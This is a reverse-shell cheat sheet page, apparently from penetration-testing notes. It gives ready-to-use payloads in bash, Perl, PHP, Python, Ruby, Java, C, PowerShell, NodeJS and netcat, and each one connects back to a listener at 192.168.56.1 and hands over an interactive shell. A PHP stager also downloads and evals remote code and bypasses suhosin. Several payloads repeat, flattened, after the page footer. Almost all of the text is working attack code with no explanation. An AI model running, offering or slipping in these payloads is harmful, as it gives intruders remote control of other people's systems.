Reverse Shells

bash

bash -i >& /dev/tcp/192.168.56.1/443 0>&1

Perl

perl -e 'use Socket;$i="192.168.56.1";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

PHP

php -r '$sock=fsockopen("192.168.56.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

<?php
error_reporting(0);
$ip = '192.168.56.1';
$port = 4444;

if (($f = 'stream_socket_client') && is_callable($f)) {
    $s = $f("tcp://{$ip}:{$port}");
    $s_type = 'stream';
}
if (!$s && ($f = 'fsockopen') && is_callable($f)) {
    $s = $f($ip, $port);
    $s_type = 'stream';
}
if (!$s && ($f = 'socket_create') && is_callable($f)) {
    $s = $f(AF_INET, SOCK_STREAM, SOL_TCP);
    $res = @socket_connect($s, $ip, $port);
    if (!$res) {
        die();
    }
    $s_type = 'socket';
}
if (!$s_type) {
    die('no socket funcs');
}
if (!$s) {
    die('no socket');
}
switch ($s_type) {
    case 'stream': $len = fread($s, 4);
        break;
    case 'socket': $len = socket_read($s, 4);
        break;
}
if (!$len) {
    die();
}
$a = unpack("Nlen", $len);
$len = $a['len'];
$b = '';
while (strlen($b) < $len) {
    switch ($s_type) {
    case 'stream': $b .= fread($s, $len-strlen($b));
        break;
    case 'socket': $b .= socket_read($s, $len-strlen($b));
        break;
    }
}
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) {
    $suhosin_bypass=create_function('', $b); $suhosin_bypass();
}
else {
    eval($b);
}
die();
?>

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.1",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Ruby

ruby -rsocket -e'f=TCPSocket.open("192.168.56.1",443).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.56.1/443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

XTerm

xterm -display 192.168.56.1:1

C

#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>

int main(void)
{
 int i; // used for dup2 later
 int sockfd; // socket file descriptor
 socklen_t socklen; // socket-length for new connections

 struct sockaddr_in srv_addr; // client address

 srv_addr.sin_family = AF_INET; // server socket type address family = internet protocol address
 srv_addr.sin_port = htons( 443 ); // connect-back port, converted to network byte order
 srv_addr.sin_addr.s_addr = inet_addr("192.168.56.1"); // connect-back ip , converted to network byte order

 // create new TCP socket
 sockfd = socket( AF_INET, SOCK_STREAM, IPPROTO_IP );

 // connect socket
 connect(sockfd, (struct sockaddr *)&srv_addr, sizeof(srv_addr));

 // dup2-loop to redirect stdin(0), stdout(1) and stderr(2)
 for(i = 0; i <= 2; i++)
  dup2(sockfd, i);

 // magic
 execve( "/bin/sh", NULL, NULL );
}

PowerShell

# Setup connection to the attacker listener (change IP and PORT)
$client = New-Object System.Net.Sockets.TCPClient('192.168.56.1', 4444);
# Stream Handle
$stream = $client.GetStream();
# Recv buffer
[byte[]]$bytes = 0..65535|%{0};
# While stream is not empty
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    # Get command (bytes to string)
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
    # Execute Command
    $sendback = (iex $data 2>&1 | Out-String);
    # Send back PS header PS C:\Windows\TEMP\>
    $sendback2 = $sendback+'PS '+(pwd).Path + '> ';
    # Convert result (String to bytes)
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    # Send result
    $stream.Write($sendbyte, 0, $sendbyte.Length);
    $stream.Flush();
};

NodeJS

(function() {
  var net = require("net"),
    cp = require("child_process"),
    sh = cp.spawn("/bin/sh", []);
  var client = new net.Socket();
  client.connect(4444, "192.168.56.1", function() {
    client.pipe(sh.stdin);
    sh.stdout.pipe(client);
    sh.stderr.pipe(client);
  });
  return /a/;
})();

Netcat

nc -e /bin/sh 192.168.56.1 4444

PreviousWeb useful commands NextDB related Commands

Last updated 4 years ago

Was this helpful?

perl -e 'use Socket;$i="192.168.56.1";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

<?php error_reporting(0); $ip = '192.168.56.1'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die(); ?>

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.1",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

#include <stdio.h> #include <unistd.h> #include <sys/socket.h> #include <netinet/in.h> int main(void) { int i; // used for dup2 later int sockfd; // socket file descriptor socklen_t socklen; // socket-length for new connections struct sockaddr_in srv_addr; // client address srv_addr.sin_family = AF_INET; // server socket type address family = internet protocol address srv_addr.sin_port = htons( 443 ); // connect-back port, converted to network byte order srv_addr.sin_addr.s_addr = inet_addr("192.168.56.1"); // connect-back ip , converted to network byte order // create new TCP socket sockfd = socket( AF_INET, SOCK_STREAM, IPPROTO_IP ); // connect socket connect(sockfd, (struct sockaddr *)&srv_addr, sizeof(srv_addr)); // dup2-loop to redirect stdin(0), stdout(1) and stderr(2) for(i = 0; i <= 2; i++) dup2(sockfd, i); // magic execve( "/bin/sh", NULL, NULL ); }

# Setup connection to the attacker listener (change IP and PORT) $client = New-Object System.Net.Sockets.TCPClient('192.168.56.1', 4444); # Stream Handle $stream = $client.GetStream(); # Recv buffer [byte[]]$bytes = 0..65535|%{0}; # While stream is not empty while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ # Get command (bytes to string) $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i); # Execute Command $sendback = (iex $data 2>&1 | Out-String); # Send back PS header PS C:\Windows\TEMP\> $sendback2 = $sendback+'PS '+(pwd).Path + '> '; # Convert result (String to bytes) $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); # Send result $stream.Write($sendbyte, 0, $sendbyte.Length); $stream.Flush(); };

(function() { var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(4444, "192.168.56.1", function() { client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; })();